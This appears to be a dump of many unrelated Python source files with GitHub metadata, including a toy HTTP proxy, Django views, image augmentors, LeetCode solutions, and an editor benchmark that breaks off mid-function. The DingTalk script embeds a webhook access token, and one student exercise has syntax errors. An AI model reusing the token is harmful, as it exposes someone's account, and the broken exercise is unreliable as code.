/Python/http/http_proxy.py
|
413b48f03f8f201e702d427e39d87f53adca2682
|
[] |
no_license
|
nyannko/socket-example
|
b058e68e8d41a8a9f5b6a29108f7de394751c904
|
934e9791b1ee92f0dd3092bb07541f1e833b4105
|
refs/heads/master
| 2021-09-10T19:19:24.590441 | 2018-03-14T22:13:49 | 2018-03-14T22:13:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,577 |
py
|
# HTTP proxy
from http.server import BaseHTTPRequestHandler, HTTPServer
from urlpath import URL
import socket
import urllib
HOST = "127.0.0.1"
PORT = 8000
# Run `curl -x http://127.0.0.1:8000 http://www.moe.edu.cn' to test proxy
class ProxyHandler(BaseHTTPRequestHandler):
# GET method
def do_GET(self):
# todo add try catch here
url = URL(self.path)
ip = socket.gethostbyname(url.netloc)
port = url.port
if port is None:
port = 80
path = url.path
print("Connected to {} {} {}".format(url ,ip ,port))
# close connection
del self.headers["Proxy-Connection"]
self.headers["Connection"] = "close"
# reconstruct headers
send_data = "GET " + path + " " + self.protocol_version + "\r\n"
header = ""
for k, v in self.headers.items():
header += "{}: {}\r\n".format(k, v)
send_data += header + "\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
s.connect((ip, port))
s.sendall(send_data.encode())
# receive data from remote
received_data = b""
while 1:
data = s.recv(4096)
if not data:
break
received_data += data
s.close()
# send data to client
self.wfile.write(received_data)
def main():
try:
server = HTTPServer((HOST, PORT), ProxyHandler)
server.serve_forever()
except KeyboardInterrupt:
server.socket.close()
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
c5ecd02296aa16caffcde786d3ab77fae28405d1
|
28c598bf75f3ab287697c7f0ff1fb13bebb7cf75
|
/build/bdist.win32/winexe/temp/OpenSSL.crypto.py
|
6acfec583072680d7cf8126acf30df4957600e19
|
[] |
no_license
|
keaysma/solinia_depreciated
|
4cb8811df4427261960af375cf749903d0ca6bd1
|
4c265449a5e9ca91f7acf7ac05cd9ff2949214ac
|
refs/heads/master
| 2020-03-25T13:08:33.913231 | 2014-09-12T08:23:26 | 2014-09-12T08:23:26 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 343 |
py
|
def __load():
import imp, os, sys
try:
dirname = os.path.dirname(__loader__.archive)
except NameError:
dirname = sys.prefix
path = os.path.join(dirname, 'crypto.pyd')
#print "py2exe extension module", __name__, "->", path
mod = imp.load_dynamic(__name__, path)
## mod.frozen = 1
__load()
del __load
|
[
"[email protected]"
] | |
16e0739edad97ed1235596b5089565cd8efa8f70
|
5b314502919bd7e12521ad126752d279912cd33d
|
/prodcons.py
|
d5e07a09cc1bdc3dcf283f36db18ea8f09ee3142
|
[
"Apache-2.0"
] |
permissive
|
xshi0001/base_function
|
68576d484418b4cda8576f729d0b48a90d0258a1
|
77ed58289151084cc20bfc3328d3ca83e6a19366
|
refs/heads/master
| 2020-12-03T02:24:14.694973 | 2017-06-27T10:51:16 | 2017-06-27T10:51:16 | 95,935,169 | 1 | 0 | null | 2017-07-01T01:39:11 | 2017-07-01T01:39:11 | null |
UTF-8
|
Python
| false | false | 1,533 |
py
|
# -*-coding=utf-8
from Queue import Queue
from random import randint
from MyThread import MyThread
from time import sleep
def queue_test(q):
#q=Queue(10);
for i in range(10):
temp = randint(1, 10)
print temp
q.put("number:", temp)
print "size of queue is %d" % q.qsize()
def writeQ(q, i):
print "producter object for Q"
data = randint(1, 10)
#print "data is %d" %data
q.put(i, 1)
print "size now in producter is %d" % q.qsize()
def readQ(q):
print "consumer object for Q"
data = q.get(1)
print data
print "now after consume Q size is %d" % q.qsize()
def writer(q, loop):
for i in range(loop):
writeQ(q, i)
sleep_time = randint(1, 3)
sleep(sleep_time)
def reader(q, loop):
for i in range(loop):
readQ(q)
sleep_time = randint(2, 5)
sleep(sleep_time)
funcs = [writer, reader]
nfuncs = len(funcs)
def area_test(a):
a = a * 10
def main():
'''
a=2
print "a=%d" %a
area_test(a)
print "a now is a= %d" %a
q=Queue(10);
print "main q size %d" %q.qsize()
queue_test(q)
print "after function q size %d" %q.qsize()
'''
threads = []
q = Queue(10)
loop = 10
for i in range(nfuncs):
t = MyThread(funcs[i], (q, loop))
threads.append(t)
for i in range(nfuncs):
threads[i].start()
'''
for i in range(nfuncs):
threads[i].join()
'''
#print "end of main"
if __name__ == "__main__":
main()
|
[
"[email protected]"
] | |
b4494671f38f7126a6d2398e2a96b7c336e7f55d
|
2a34a824e1a2d3bac7b99edcf19926a477a157a0
|
/src/cr/vision/io/videowriter.py
|
7277eb9220a2e28a1d27d3f2748e3fc3a6ce7fee
|
[
"Apache-2.0"
] |
permissive
|
carnotresearch/cr-vision
|
a7cb07157dbf470ed3fe560ef85d6e5194c660ae
|
317fbf70c558e8f9563c3d0ba3bebbc5f84af622
|
refs/heads/master
| 2023-04-10T22:34:34.833043 | 2021-04-25T13:32:14 | 2021-04-25T13:32:14 | 142,256,002 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,323 |
py
|
'''
Wrapper for OpenCV video writer
'''
import cv2
class VideoWriter:
'''Wrapper class for OpenCV video writer'''
def __init__(self, filepath, fourcc='XVID', fps=15, frame_size=(640, 480), is_color=True):
'''Constructor'''
self.filepath = filepath
if isinstance(fourcc, str):
fourcc = cv2.VideoWriter_fourcc(*fourcc)
elif isinstance(fourcc, int):
pass
else:
raise "Invalid fourcc code"
self.stream = cv2.VideoWriter(filepath, fourcc, fps, frame_size)
self.counter = 0
def write(self, frame):
'''Writes a frame to output file'''
self.stream.write(frame)
self.counter += 1
print(self.counter)
def is_open(self):
'''Returns if the stream is open for writing'''
if self.stream is None:
return False
return self.stream.isOpened()
def stop(self):
'''Stop serving more frames'''
if self.stream is None:
# nothing to do
return
self.stream.release()
self.stream = None
def __del__(self):
# Ensure cleanup
self.stop()
def __enter__(self):
return self
def __exit__(self):
self.stop()
def __call__(self, frame):
self.write(frame)
|
[
"[email protected]"
] | |
a618bd2571db03d8262b8233c0af56287cb540db
|
50dcaae873badd727e8416302a88f9c0bff0a438
|
/bookstore/migrations/0002_auto_20170101_0049.py
|
d3e6f7c0947c25e5f8687afb88146674f49c0239
|
[] |
no_license
|
jattoabdul/albaitulilm
|
4ae0dc857509012e8aa5d775cda64305de562251
|
c5586edaed045fec925a6c0bb1be5e220cbd8d15
|
refs/heads/master
| 2021-01-13T00:00:01.397037 | 2017-02-12T23:32:42 | 2017-02-12T23:32:42 | 81,761,579 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 641 |
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-12-31 23:49
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('bookstore', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='book',
options={'ordering': ['title'], 'verbose_name_plural': 'Books'},
),
migrations.AddField(
model_name='author',
name='image',
field=models.ImageField(blank=True, upload_to='authors', verbose_name="Author's Avatar"),
),
]
|
[
"[email protected]"
] | |
fd5c1bace80b13e13c1a052dd0dcd6ce9afea215
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_340/ch4_2020_03_23_19_22_41_022512.py
|
4f38805b970b740b4a241620cdc59197c4c64017
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 174 |
py
|
def idade(x):
x=int(input('digite sua idade'))
return idade
if (idade=<11):
print('crianca')
if (12<=idade<=17):
print('adolescente')
if (idade>=18):
print ('adulto')
|
[
"[email protected]"
] | |
e2db064b4c559a481a1ab0ba635a84b59bd259e2
|
3e19d4f20060e9818ad129a0813ee758eb4b99c6
|
/conftest.py
|
1b0f10a63a7f6eddd9bf25df6187cc5b35adee18
|
[
"MIT"
] |
permissive
|
ReyvanZA/bitfinex_ohlc_import
|
07bf85f4de8b0be3dc6838e188160d2b4963f284
|
6d6d548187c52bcd7e7327f411fab515c83faef1
|
refs/heads/master
| 2020-08-11T14:22:15.832186 | 2019-10-31T17:51:21 | 2019-11-11T11:33:28 | 214,579,369 | 0 | 0 |
MIT
| 2019-11-11T11:33:29 | 2019-10-12T04:48:12 | null |
UTF-8
|
Python
| false | false | 546 |
py
|
import pytest
@pytest.fixture
def symbols_fixture():
# symbols for testing
return [
"btcusd",
"ltcbtc",
"ethusd"
]
def candles_fixture():
return [[
1518272040000,
8791,
8782.1,
8795.8,
8775.8,
20.01209543
],
[
1518271980000,
8768,
8790.7,
8791,
8768,
38.41333393
],
[
1518271920000,
8757.3,
8768,
8770.6396831,
8757.3,
20.92449167
]]
|
[
"[email protected]"
] | |
5790747bf3bb59cf374317ac2044970705d035fb
|
3213373f90f10c60667c26a56d30a9202e1b9ae3
|
/language/orqa/predict/orqa_eval.py
|
1fe260eb6edd190f0e5df545f0ad78f7fc8a06b0
|
[
"Apache-2.0",
"LicenseRef-scancode-generic-cla"
] |
permissive
|
Mistobaan/language
|
59a481b3ff6a7c7beada2361aef7173fbfd355a4
|
394675a831ae45ea434abb50655e7975c68a7121
|
refs/heads/master
| 2022-11-29T14:10:37.590205 | 2020-08-13T22:28:13 | 2020-08-13T22:31:38 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,448 |
py
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""ORQA evaluation."""
import json
import os
from absl import flags
from language.orqa.models import orqa_model
from language.orqa.utils import eval_utils
import six
import tensorflow.compat.v1 as tf
FLAGS = flags.FLAGS
flags.DEFINE_string("model_dir", None, "Model directory.")
flags.DEFINE_string("dataset_path", None, "Data path.")
def main(_):
predictor = orqa_model.get_predictor(FLAGS.model_dir)
example_count = 0
correct_count = 0
predictions_path = os.path.join(FLAGS.model_dir, "predictions.jsonl")
with tf.io.gfile.GFile(predictions_path, "w") as predictions_file:
with tf.io.gfile.GFile(FLAGS.dataset_path) as dataset_file:
for line in dataset_file:
example = json.loads(line)
question = example["question"]
answers = example["answer"]
predictions = predictor(question)
predicted_answer = six.ensure_text(
predictions["answer"], errors="ignore")
is_correct = eval_utils.is_correct(
answers=[six.ensure_text(a) for a in answers],
prediction=predicted_answer,
is_regex=False)
predictions_file.write(
json.dumps(
dict(
question=question,
prediction=predicted_answer,
predicted_context=six.ensure_text(
predictions["orig_block"], errors="ignore"),
correct=is_correct,
answer=answers)))
predictions_file.write("\n")
correct_count += int(is_correct)
example_count += 1
tf.logging.info("Accuracy: %.4f (%d/%d)",
correct_count/float(example_count),
correct_count,
example_count)
if __name__ == "__main__":
tf.disable_v2_behavior()
tf.app.run()
|
[
"[email protected]"
] | |
81dbc6da5a67a3c9d1cf4e3e4013b93416329c60
|
aef08a7c30c80d24a1ba5708f316153541b841d9
|
/Leetcode 0071. Simplify Path.py
|
7f9fbb46989a724cd62a68c8396c195fbacddb48
|
[] |
no_license
|
Chaoran-sjsu/leetcode
|
65b8f9ba44c074f415a25989be13ad94505d925f
|
6ff1941ff213a843013100ac7033e2d4f90fbd6a
|
refs/heads/master
| 2023-03-19T02:43:29.022300 | 2020-11-03T02:33:25 | 2020-11-03T02:33:25 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,539 |
py
|
"""
71. Simplify Path
Given an absolute path for a file (Unix-style), simplify it. Or in other words, convert it to the canonical path.
In a UNIX-style file system, a period . refers to the current directory. Furthermore, a double period .. moves the directory up a level.
Note that the returned canonical path must always begin with a slash /, and there must be only a single slash / between two directory names. The last directory name (if it exists) must not end with a trailing /. Also, the canonical path must be the shortest string representing the absolute path.
Example 1:
Input: "/home/"
Output: "/home"
Explanation: Note that there is no trailing slash after the last directory name.
Example 2:
Input: "/../"
Output: "/"
Explanation: Going one level up from the root directory is a no-op, as the root level is the highest level you can go.
Example 3:
Input: "/home//foo/"
Output: "/home/foo"
Explanation: In the canonical path, multiple consecutive slashes are replaced by a single one.
Example 4:
Input: "/a/./b/../../c/"
Output: "/c"
Example 5:
Input: "/a/../../b/../c//.//"
Output: "/c"
Example 6:
Input: "/a//b////c/d//././/.."
Output: "/a/b/c"
"""
class Solution:
def simplifyPath(self, path: str) -> str:
stack = []
for s in path.split("/"):
if len(s) == 0 or s == ".":
continue
elif s == "..":
if len(stack) > 0:
stack.pop()
else:
stack.append(s)
return "/" + "/".join(stack)
|
[
"[email protected]"
] | |
f46600e041a9e3fa1eb90c0961f25917ad284329
|
e95fc8c562c050f47ecb6fb2639ce3024271a06d
|
/medium/46.全排列.py
|
60bd223afd3aaf74a76e0693f8cd590cbe521c1d
|
[] |
no_license
|
w940853815/my_leetcode
|
3fb56745b95fbcb4086465ff42ea377c1d9fc764
|
6d39fa76c0def4f1d57840c40ffb360678caa96e
|
refs/heads/master
| 2023-05-25T03:39:32.304242 | 2023-05-22T01:46:43 | 2023-05-22T01:46:43 | 179,017,338 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,032 |
py
|
#
# @lc app=leetcode.cn id=46 lang=python3
#
# [46] 全排列
#
# @lc code=start
from typing import List
"""
result = []
def backtrack(路径, 选择列表):
if 满足结束条件:
result.add(路径)
return
for 选择 in 选择列表:
做选择
backtrack(路径, 选择列表)
撤销选择
"""
class Solution:
def permute(self, nums: List[int]) -> List[List[int]]:
res = []
track = []
def backtrack(track, nums):
if len(track) == len(nums):
# 列表深拷贝
tmp = list(track)
res.append(tmp)
return
for i in range(len(nums)):
if nums[i] in track:
continue
track.append(nums[i])
backtrack(track, nums)
track.pop()
backtrack(track, nums)
return res
if __name__ == "__main__":
s = Solution()
res = s.permute([1, 2, 3])
print(res)
# @lc code=end
|
[
"[email protected]"
] | |
696b87b0bff7a5bcf494441ef9ff10dbad893cd4
|
8fd07ea363ba4263bafe25d213c72cc9a93e2b3e
|
/devops/Day4_json_requests_zabbix-api/zabbix/dingtalk.py
|
2112181a91ce4aaf534cba9d5b2bc2035ec13296
|
[] |
no_license
|
ml758392/python_tedu
|
82e12ae014f0fc81230386fab07f901510fc8837
|
9f20798604db0ac8cd7b69d8c7a52ee361ebc7a7
|
refs/heads/master
| 2020-04-12T08:30:42.354663 | 2019-03-29T11:55:30 | 2019-03-29T11:55:30 | 162,386,878 | 1 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 821 |
py
|
# -*-coding:utf-8-*-
import json
import requests
import sys
def send_msg(url, reminders, msg):
headers = {'Content-Type': 'application/json;charset=utf-8'}
data = {
"msgtype": "text", # 发送消息类型为文本
"at": {
"atMobiles": reminders,
"isAtAll": False, # 不@所有人
},
"text": {
"content": msg, # 消息正文
}
}
r = requests.post(url, data=json.dumps(data), headers=headers)
return r.text
if __name__ == '__main__':
msg = sys.argv[1]
reminders = ['15937762237'] # 特别提醒要查看的人,就是@某人一下
url = 'https://oapi.dingtalk.com/robot/send?access_token=f62936c2eb31a053f422b5fdea9ea4748ce873a399ab521ccbf3ec\
29fefce9d1'
print(send_msg(url, reminders, msg))
|
[
"yy.tedu.cn"
] |
yy.tedu.cn
|
616469de1aec009732d1ae11d1d7737bda848a16
|
75a2d464d10c144a6226cb5941c86423a1f769cf
|
/users/views.py
|
21cc73b926aab722ac47e1f4965cdb0561c47aff
|
[] |
no_license
|
Swiftkind/invoice
|
f5543cbe81b6d42e9938470265d7affb56ab83dd
|
17615ea9bfb1edebe41d60dbf2e977f0018d5339
|
refs/heads/master
| 2021-09-07T18:16:01.647083 | 2018-02-08T08:13:18 | 2018-02-08T08:13:18 | 115,474,697 | 0 | 3 | null | 2018-02-27T06:58:42 | 2017-12-27T02:55:40 |
Python
|
UTF-8
|
Python
| false | false | 5,494 |
py
|
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib import messages
from django.http import Http404
from django.shortcuts import get_object_or_404, render, redirect
from django.views.generic import TemplateView
from django.views import View
from users.forms import CompanyForm, UserChangePasswordForm, UserUpdateForm, SigninForm, SignupForm
from users.mixins import UserIsOwnerMixin
from users.models import Company, User
class SigninView(TemplateView):
"""Signin user
"""
template_name = 'users/signin.html'
def get(self, *args, **kwargs):
"""Get signin form
"""
if self.request.user.is_authenticated:
return redirect('index')
form = SigninForm()
return render(self.request, self.template_name,{'form':form})
def post(self, *args, **kwargs):
"""Signin user
"""
form = SigninForm(data=self.request.POST)
if form.is_valid():
login(self.request, form.user_cache)
return redirect('index')
else:
context={ 'form':form,}
return render(self.request, self.template_name, context)
class SignupView(TemplateView):
"""Signup user
"""
template_name = 'users/signup.html'
def get(self, *args, **kwargs):
"""Display signup form
"""
context = { 'company_form' : CompanyForm(),
'signup_form' : SignupForm(),
}
return render(self.request, self.template_name, context)
def post(self, *args, **kwargs):
company_form = CompanyForm(self.request.POST, self.request.FILES)
signup_form = SignupForm(self.request.POST, self.request.FILES)
if signup_form.is_valid() and company_form.is_valid():
company = company_form.save(commit=False)
user = signup_form.save(commit=False)
company.save()
user.company = company
user.save()
messages.error(self.request, 'Account successfully created. Activate your account from the admin.')
return redirect('index')
else:
context = { 'company_form' : CompanyForm(self.request.POST),
'signup_form' : SignupForm(self.request.POST),
}
return render(self.request, self.template_name, context)
class SignoutView(LoginRequiredMixin, View):
"""Signout a user
"""
def get(self, *args, **kwargs):
"""Logout user and redirect to signin
"""
logout(self.request)
return redirect('signin')
class UserProfileView(UserIsOwnerMixin, TemplateView):
"""User profile
"""
template_name = 'users/profile.html'
def get(self, *args, **kwargs):
"""View user details
"""
context = {'user': get_object_or_404(User, pk=kwargs['user_id'])}
return render(self.request, self.template_name, context=context)
class UserUpdateView(UserIsOwnerMixin, TemplateView):
"""Update User
"""
template_name = 'users/update_user.html'
def get(self, *args, **kwargs):
"""Display form
"""
user = get_object_or_404(User, pk=kwargs['user_id'])
if self.request.user == user:
context = { 'company_form':CompanyForm(instance=user.company),
'user_form': UserUpdateForm(instance=user),
}
return render(self.request, self.template_name, context=context)
else:
raise Http404("Does not exist")
def post(self, request, *args, **kwargs):
"""Update a user
"""
user = get_object_or_404(User, pk=kwargs['user_id'])
user_form = UserUpdateForm(self.request.POST, self.request.FILES,instance=user)
company_form = CompanyForm(self.request.POST, self.request.FILES,instance=user.company)
if user_form.is_valid() and company_form.is_valid():
company_form.save()
user_form.save()
messages.success(self.request, 'User is successfully updated')
return redirect('index' )
else:
context = { 'company_form': company_form,
'user_form' : user_form,
}
return render(self.request, self.template_name, context=context)
class UserSettingView(UserIsOwnerMixin, TemplateView):
""" User settings
"""
template_name = 'users/setting.html'
def get(self, *args, **kwargs):
""" View setting
"""
return render(self.request, self.template_name)
class UserChangePassword(UserIsOwnerMixin, TemplateView):
""" User change password
"""
template_name = 'users/change_password.html'
def get(self, *args, **kwargs):
""" Change password form
"""
context = {}
context['form'] = UserChangePasswordForm()
return render(self.request, self.template_name, context)
def post(self, *args, **kwargs):
""" Check old and new password match
"""
form = UserChangePasswordForm(self.request.POST, user=self.request.user)
if form.is_valid():
form.save()
return redirect('index')
else:
context = {}
context['form'] = UserChangePasswordForm(self.request.POST, user=self.request.user)
return render(self.request, self.template_name, context)
|
[
"[email protected]"
] | |
df7db5f6cf855b9e25fa5feb01494b88573aacf4
|
c5458f2d53d02cb2967434122183ed064e1929f9
|
/sdks/python/test/test_contains_asset_predicate.py
|
4fe42254ff5b1cf16affd36b2f5c261675e7f2ab
|
[] |
no_license
|
ross-weir/ergo-node-api-sdks
|
fd7a32f79784dbd336ef6ddb9702b9dd9a964e75
|
9935ef703b14760854b24045c1307602b282c4fb
|
refs/heads/main
| 2023-08-24T05:12:30.761145 | 2021-11-08T10:28:10 | 2021-11-08T10:28:10 | 425,785,912 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,131 |
py
|
"""
Ergo Node API
API docs for Ergo Node. Models are shared between all Ergo products # noqa: E501
The version of the OpenAPI document: 4.0.15
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import sys
import unittest
import openapi_client
from openapi_client.model.contains_asset_predicate_all_of import ContainsAssetPredicateAllOf
from openapi_client.model.scanning_predicate import ScanningPredicate
globals()['ContainsAssetPredicateAllOf'] = ContainsAssetPredicateAllOf
globals()['ScanningPredicate'] = ScanningPredicate
from openapi_client.model.contains_asset_predicate import ContainsAssetPredicate
class TestContainsAssetPredicate(unittest.TestCase):
"""ContainsAssetPredicate unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testContainsAssetPredicate(self):
"""Test ContainsAssetPredicate"""
# FIXME: construct object with mandatory attributes with example values
# model = ContainsAssetPredicate() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
0c77dbbd8fb08d26e300e02084f0f0fbd2f1fcfe
|
80c3546d525a05a31d30cc318a44e053efaeb1f1
|
/tensorpack/dataflow/imgaug/misc.py
|
7fc983d4c9de61f53efc05459cca5493fcaca5a5
|
[
"Apache-2.0"
] |
permissive
|
yaroslavvb/tensorpack
|
0f326bef95699f84376465609b631981dc5b68bf
|
271ffad1816132c57baebe8a1aa95479e79f4ef9
|
refs/heads/master
| 2021-05-03T11:02:22.170689 | 2018-02-06T08:18:48 | 2018-02-06T08:18:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,419 |
py
|
# -*- coding: UTF-8 -*-
# File: misc.py
import numpy as np
import cv2
from .base import ImageAugmentor
from ...utils import logger
from ...utils.argtools import shape2d
from .transform import ResizeTransform, TransformAugmentorBase
__all__ = ['Flip', 'Resize', 'RandomResize', 'ResizeShortestEdge', 'Transpose']
class Flip(ImageAugmentor):
"""
Random flip the image either horizontally or vertically.
"""
def __init__(self, horiz=False, vert=False, prob=0.5):
"""
Args:
horiz (bool): use horizontal flip.
vert (bool): use vertical flip.
prob (float): probability of flip.
"""
super(Flip, self).__init__()
if horiz and vert:
raise ValueError("Cannot do both horiz and vert. Please use two Flip instead.")
elif horiz:
self.code = 1
elif vert:
self.code = 0
else:
raise ValueError("At least one of horiz or vert has to be True!")
self._init(locals())
def _get_augment_params(self, img):
h, w = img.shape[:2]
do = self._rand_range() < self.prob
return (do, h, w)
def _augment(self, img, param):
do, _, _ = param
if do:
ret = cv2.flip(img, self.code)
if img.ndim == 3 and ret.ndim == 2:
ret = ret[:, :, np.newaxis]
else:
ret = img
return ret
def _augment_coords(self, coords, param):
do, h, w = param
if do:
if self.code == 0:
coords[:, 1] = h - coords[:, 1]
elif self.code == 1:
coords[:, 0] = w - coords[:, 0]
return coords
class Resize(TransformAugmentorBase):
""" Resize image to a target size"""
def __init__(self, shape, interp=cv2.INTER_LINEAR):
"""
Args:
shape: (h, w) tuple or a int
interp: cv2 interpolation method
"""
shape = tuple(shape2d(shape))
self._init(locals())
def _get_augment_params(self, img):
return ResizeTransform(
img.shape[0], img.shape[1],
self.shape[0], self.shape[1], self.interp)
class ResizeShortestEdge(TransformAugmentorBase):
"""
Resize the shortest edge to a certain number while
keeping the aspect ratio.
"""
def __init__(self, size, interp=cv2.INTER_LINEAR):
"""
Args:
size (int): the size to resize the shortest edge to.
"""
size = int(size)
self._init(locals())
def _get_augment_params(self, img):
h, w = img.shape[:2]
scale = self.size * 1.0 / min(h, w)
if h < w:
newh, neww = self.size, int(scale * w + 0.5)
else:
newh, neww = int(scale * h + 0.5), self.size
return ResizeTransform(
h, w, newh, neww, self.interp)
class RandomResize(TransformAugmentorBase):
""" Randomly rescale width and height of the image."""
def __init__(self, xrange, yrange, minimum=(0, 0), aspect_ratio_thres=0.15,
interp=cv2.INTER_LINEAR):
"""
Args:
xrange (tuple): a (min, max) tuple. If is floating point, the
tuple defines the range of scaling ratio of new width, e.g. (0.9, 1.2).
If is integer, the tuple defines the range of new width in pixels, e.g. (200, 350).
yrange (tuple): similar to xrange, but for height.
minimum (tuple): (xmin, ymin) in pixels. To avoid scaling down too much.
aspect_ratio_thres (float): discard samples which change aspect ratio
larger than this threshold. Set to 0 to keep aspect ratio.
interp: cv2 interpolation method
"""
super(RandomResize, self).__init__()
assert aspect_ratio_thres >= 0
self._init(locals())
def is_float(tp):
return isinstance(tp[0], float) or isinstance(tp[1], float)
assert is_float(xrange) == is_float(yrange), "xrange and yrange has different type!"
self._is_scale = is_float(xrange)
if self._is_scale and aspect_ratio_thres == 0:
assert xrange == yrange
def _get_augment_params(self, img):
cnt = 0
h, w = img.shape[:2]
def get_dest_size():
if self._is_scale:
sx = self._rand_range(*self.xrange)
if self.aspect_ratio_thres == 0:
sy = sx
else:
sy = self._rand_range(*self.yrange)
destX = max(sx * w, self.minimum[0])
destY = max(sy * h, self.minimum[1])
else:
sx = self._rand_range(*self.xrange)
if self.aspect_ratio_thres == 0:
sy = sx * 1.0 / w * h
else:
sy = self._rand_range(*self.yrange)
destX = max(sx, self.minimum[0])
destY = max(sy, self.minimum[1])
return (int(destX + 0.5), int(destY + 0.5))
while True:
destX, destY = get_dest_size()
if self.aspect_ratio_thres > 0: # don't check when thres == 0
oldr = w * 1.0 / h
newr = destX * 1.0 / destY
diff = abs(newr - oldr) / oldr
if diff >= self.aspect_ratio_thres + 1e-5:
cnt += 1
if cnt > 50:
logger.warn("RandomResize failed to augment an image")
return ResizeTransform(h, w, h, w, self.interp)
continue
return ResizeTransform(h, w, destY, destX, self.interp)
class Transpose(ImageAugmentor):
"""
Random transpose the image
"""
def __init__(self, prob=0.5):
"""
Args:
prob (float): probability of transpose.
"""
super(Transpose, self).__init__()
self.prob = prob
self._init()
def _get_augment_params(self, img):
return self._rand_range() < self.prob
def _augment(self, img, do):
ret = img
if do:
ret = cv2.transpose(img)
if img.ndim == 3 and ret.ndim == 2:
ret = ret[:, :, np.newaxis]
return ret
def _augment_coords(self, coords, do):
if do:
coords = coords[:, ::-1]
return coords
|
[
"[email protected]"
] | |
92572d40e11aaec728a9177ec310fa9eb822e9f5
|
b6f4e527154b82f4e3fa48f06ca53fc15bf08283
|
/Day02/circle.py
|
020bf65e82244b1110af1fb98f7a1eaca88e783e
|
[] |
no_license
|
Light-City/Python-100-Days
|
74118e36c658db6c897f847e7e554311af036b9d
|
1fe049a1fe1e64082752d2d32cb75c1a4349cded
|
refs/heads/master
| 2020-03-18T12:44:53.191512 | 2018-05-24T09:49:22 | 2018-05-24T09:49:22 | 134,741,794 | 3 | 1 | null | 2018-05-24T16:29:02 | 2018-05-24T16:29:02 | null |
UTF-8
|
Python
| false | false | 288 |
py
|
"""
输入半径计算圆的周长和面积
Version: 0.1
Author: 骆昊
Date: 2018-02-27
"""
import math
radius = float(input('请输入圆的半径: '))
perimeter = 2 * math.pi * radius
area = math.pi * radius * radius
print('周长: %.2f' % perimeter)
print('面积: %.2f' % area)
|
[
"[email protected]"
] | |
6df0e64800da4c8a788cf625ac191169d6db205a
|
5c4852f02b20c5c400c58ff61702a4f35358d78c
|
/editor_orig.py
|
6a4e667273bf50ee0537555a81df701903e3eec4
|
[] |
no_license
|
anovacap/daily_coding_problem
|
6e11f338ad8afc99a702baa6d75ede0c15f02853
|
e64a0e76555addbe3a31fd0ca0bb81e2715766d2
|
refs/heads/master
| 2023-02-23T11:04:30.041455 | 2021-01-29T18:10:36 | 2021-01-29T18:10:36 | 302,237,546 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,992 |
py
|
class SimpleEditor:
def __init__(self, document):
self.document = document
self.dictionary = set()
# On windows, the dictionary can often be found at:
# C:/Users/{username}/AppData/Roaming/Microsoft/Spelling/en-US/default.dic
with open("/usr/share/dict/words") as input_dictionary:
for line in input_dictionary:
words = line.strip().split(" ")
for word in words:
self.dictionary.add(word)
self.paste_text = ""
def cut(self, i, j):
self.paste_text = self.document[i:j]
self.document = self.document[:i] + self.document[j:]
def copy(self, i, j):
self.paste_text = self.document[i:j]
def paste(self, i):
self.document = self.document[:i] + self.paste_text + self.document[i:]
def get_text(self):
return self.document
def misspellings(self):
result = 0
for word in self.document.split(" "):
if word not in self.dictionary:
result = result + 1
return result
import timeit
class EditorBenchmarker:
new_editor_case = """
from __main__ import SimpleEditor
s = SimpleEditor("{}")"""
editor_cut_paste = """
for n in range({}):
if n%2 == 0:
s.cut(1, 3)
else:
s.paste(2)"""
editor_copy_paste = """
for n in range({}):
if n%2 == 0:
s.copy(1, 3)
else:
s.paste(2)"""
editor_get_text = """
for n in range({}):
s.get_text()"""
editor_mispellings = """
for n in range({}):
s.misspellings()"""
def __init__(self, cases, N):
self.cases = cases
self.N = N
self.editor_cut_paste = self.editor_cut_paste.format(N)
self.editor_copy_paste = self.editor_copy_paste.format(N)
self.editor_get_text = self.editor_get_text.format(N)
self.editor_mispellings = self.editor_mispellings.format(N)
def benchmark(self):
for case in self.cases:
print("Evaluating case: {}".format(case))
new_editor = self.new_editor_case.format(case)
cut_paste_time = timeit.repeat(stmt=self.editor_cut_paste,setup=new_editor,repeat=3,number=1)
print("{} cut paste operations took {} s".format(self.N, cut_paste_time))
copy_paste_time = timeit.repeat(stmt=self.editor_copy_paste,setup=new_editor,repeat=3,number=1)
print("{} copy paste operations took {} s".format(self.N, copy_paste_time))
get_text_time = timeit.repeat(stmt=self.editor_get_text,setup=new_editor,repeat=3,number=1)
